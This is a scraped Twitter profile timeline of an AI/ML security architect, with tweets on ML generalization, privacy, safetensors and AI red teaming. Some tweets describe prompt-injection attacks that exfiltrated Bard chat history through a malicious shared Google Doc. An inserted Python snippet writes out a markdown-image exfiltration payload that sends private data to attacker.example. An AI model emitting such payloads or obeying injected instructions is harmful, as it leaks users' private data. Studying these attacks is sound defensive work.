Rich Harang (@rharang)'s Twitter Profile
Rich Harang

@rharang

Using bad guys to catch math since 2010. Principal Security Architect (AI/ML) at NVIDIA. He/him. Personal account and opinions: `from std_disclaimers import *`.

ID:195915277

Link: https://scholar.google.com/citations?user=TPkC91wAAAAJ&hl=en · Joined: 27-09-2010 21:59:36

15.6K Tweets

2.8K Followers

681 Following

Matt Spike(@matspike) 's Twitter Profile Photo

OH when YOU say 'generalization' you're talking about INDUCTIVE INFERENCE ha ha ha no WE meant DEDUCTIVE INTERPOLATION all this time, hahaha sorry for that mix-up *loud scraping noise as goalposts get yanked into a new position*

MMitchell(@mmitchell_ai) 's Twitter Profile Photo

If this is reproducible for LLMs, then if you care about the safety of AI systems, it's another reason why we need to measure data with at least the same scientific rigor as we use to evaluate models. By understanding the data, we can understand what the model may do. 🧵

xlr8harder(@xlr8harder) 's Twitter Profile Photo

So these GPT assistants are cool, but I still don't see how they're going to solve third-party prompt injection vulnerabilities as they continue adding more capabilities to assistants.

Kai Greshake you getting ready for this?

infosecanon(@infosecanon) 's Twitter Profile Photo

They bought active duty military financial and health data for 20 cents. Under a foreign domain.

Please please please we need a US federal privacy law that makes this illegal.

intelliJay-Z(@aymannadeem) 's Twitter Profile Photo

Biden's Executive Order won't save us. 🚫

Discover why I believe a nuanced approach, considering context and platform specifics, is essential when discussing policy decisions.

aymannadeem.com/artificial/int…

Chomba Bupe(@ChombaBupe) 's Twitter Profile Photo

Transformers in-context learn to predict f(x_(n+1)) from a sequence s:

s = (x_1, f(x_1), x_2, f(x_2), ..., x_n, f(x_n), x_(n+1))

Only if it's seen similar examples before in the training set.

Which shows that transformers are doing approximate interpolative retrieval.

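The claim in the tweet above can be sketched mechanically. This is an illustrative toy (my example, not the author's): it builds the interleaved in-context sequence s the tweet describes, and uses a nearest-neighbor lookup as a stand-in for the claimed "approximate interpolative retrieval" behavior.

```python
# Hypothetical sketch: the in-context format from the tweet, with a
# nearest-neighbor interpolator standing in for the transformer.

def build_prompt(xs, f, x_query):
    """Interleave (x_i, f(x_i)) pairs and append the query point x_(n+1)."""
    s = []
    for x in xs:
        s.extend([x, f(x)])
    s.append(x_query)
    return s

def interpolative_retrieval(s):
    """Predict f(x_query) by retrieving the nearest in-context example."""
    pairs = list(zip(s[0:-1:2], s[1:-1:2]))  # recover (x_i, f(x_i)) pairs
    x_query = s[-1]
    nearest_x, nearest_y = min(pairs, key=lambda p: abs(p[0] - x_query))
    return nearest_y

f = lambda x: 2 * x + 1
s = build_prompt([1.0, 2.0, 3.0], f, 2.1)
print(interpolative_retrieval(s))  # retrieves f(2.0) = 5.0
```

A retrieval mechanism like this only works when a similar example already sits in the context, which is the tweet's point about training-set coverage.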
Stella Biderman(@BlancheMinerva) 's Twitter Profile Photo

Integrations are a well-known and barely secured threat vector. If you're pro-API models because you trust the opsec of companies, you should rethink your priorities.

Simon Willison(@simonw) 's Twitter Profile Photo

This kind of data exfiltration attack is inevitable any time you give an LLM access to both private data and potentially untrusted inputs at the same time

The trick here is a malicious shared Google Doc combined with an exfiltration logging script hosted using AppScript

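The attack shape described above can be made concrete with a small sketch (all names here are hypothetical, not from the tweet): injected instructions in untrusted content ask the model to render a markdown image whose URL smuggles private context to an attacker-controlled endpoint, so merely displaying the response triggers the exfiltrating GET request.

```python
# Illustrative sketch of markdown-image exfiltration; attacker.example is
# a hypothetical attacker-controlled logging endpoint.
from urllib.parse import quote, urlparse, parse_qs

def malicious_markdown(private_data: str) -> str:
    # What an injected prompt asks the model to emit: an "image" that is
    # really a GET request carrying the private data in its query string.
    return f"![x](https://attacker.example/log?q={quote(private_data)})"

def leaked_data(markdown: str) -> str:
    # Defender's view: decode what rendering that image URL would leak.
    url = markdown[markdown.index("(") + 1 : markdown.rindex(")")]
    return parse_qs(urlparse(url).query)["q"][0]

out = malicious_markdown("meeting notes: Q3 roadmap")
print(leaked_data(out))  # prints: meeting notes: Q3 roadmap
```

This is why the tweet frames the problem as combining private data with untrusted inputs: the model never needs network access itself; the renderer makes the request.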
Rich Harang(@rharang) 's Twitter Profile Photo

Anyone have a good prompt template to keep chatGPT from producing numbered/bullet lists? I can't seem to get it to stop doing it.

Rich Harang(@rharang) 's Twitter Profile Photo

Outlook keeps hiding travel related emails from me, forcing me to explicitly do a manual search to be allowed to see them, even when they're at the top of my goddamn inbox.

What the fuck is going on over there?

Stephan Hoyer(@shoyer) 's Twitter Profile Photo

Something that I think is under-appreciated in the current AI mania is that more compute does not always result in better models. Sometimes, even with perfect knowledge, you can hit a wall.

A good example of this is weather prediction.
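Weather is the textbook chaotic system, and the "wall" the tweet gestures at shows up in even the simplest chaotic map. A hedged illustration (my example, not the author's): with a perfect model, a tiny uncertainty in the initial state grows exponentially, so there is a forecast horizon that no amount of extra compute can push past.

```python
# Toy demonstration of sensitive dependence on initial conditions using
# the logistic map at r=4, a standard chaotic system.
def logistic(x, r=4.0):
    return r * x * (1.0 - x)

x, x_pert = 0.4, 0.4 + 1e-10  # same model, near-identical initial states
max_gap = 0.0
for step in range(60):
    x, x_pert = logistic(x), logistic(x_pert)
    max_gap = max(max_gap, abs(x - x_pert))

print(max_gap > 0.01)  # True: a 1e-10 uncertainty has blown up to O(1)
```

The error roughly doubles each step, so after a few dozen iterations the two trajectories are uncorrelated; more compute only buys a logarithmically longer horizon.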

Johann Rehberger(@wunderwuzzi23) 's Twitter Profile Photo

👉 Hacking Google Bard: From Prompt Injection to Data Exfiltration

A nice example of a high impact prompt injection attack that led to chat history exfiltration (delivered via forced Google Doc sharing) 🔥🔥🔥



embracethered.com/blog/posts/202…

Lysandre(@LysandreJik) 's Twitter Profile Photo

🤗 Transformers v4.35 is out, and safetensors serialization is now the default.

Saving a torch model using `save_pretrained` will now save it as a safetensors file containing only tensors.

Loading files in this format provides a much safer experience. Why?
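The safety argument comes down to the file layout. A minimal sketch of the published safetensors format, using only the standard library (this is a toy writer/reader for illustration, not the real `safetensors` library): an 8-byte little-endian header length, a JSON header mapping tensor names to dtype/shape/byte offsets, then raw tensor bytes. Parsing it is just JSON plus byte slicing; unlike pickle, nothing in the file can execute code on load.

```python
# Toy implementation of the safetensors on-disk layout, stdlib only.
import json, struct

def write_safetensors_like(path, tensors):
    """tensors: name -> (dtype, shape, raw bytes)."""
    header, offset, blobs = {}, 0, []
    for name, (dtype, shape, raw) in tensors.items():
        header[name] = {"dtype": dtype, "shape": shape,
                        "data_offsets": [offset, offset + len(raw)]}
        offset += len(raw)
        blobs.append(raw)
    hjson = json.dumps(header).encode()
    with open(path, "wb") as f:
        f.write(struct.pack("<Q", len(hjson)) + hjson + b"".join(blobs))

def read_header(path):
    # Loading is pure data parsing: a length, a JSON dict, raw bytes.
    with open(path, "rb") as f:
        (hlen,) = struct.unpack("<Q", f.read(8))
        return json.loads(f.read(hlen))

write_safetensors_like("toy.safetensors",
                       {"w": ("F32", [2], struct.pack("<2f", 1.0, 2.0))})
print(read_header("toy.safetensors"))
# prints: {'w': {'dtype': 'F32', 'shape': [2], 'data_offsets': [0, 8]}}
```

A pickle-based checkpoint, by contrast, is a bytecode program for Python's unpickler and can invoke arbitrary callables during deserialization.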

moo(@moo_hax) 's Twitter Profile Photo

It's real.

From detecting sandboxes with ML, all the way to now. I don't think I could be more excited to be part of an offensive ML company with Nick Landers

dreadnode(@dreadnode) 's Twitter Profile Photo

We're live!

Dreadnode is all about AI red teaming and offensive ML. Founders are moo (@moo_hax) and Nick Landers (@monoxgas). Follow us for research, tooling, evals, and challenges.

dreadnode.io

Let the real hacking begin.

Rich Harang(@rharang) 's Twitter Profile Photo

It has been ~~many~~ 0 days since I last had it forcibly driven home to me that optimizers give you what you _ask for_ and not what you _want_.
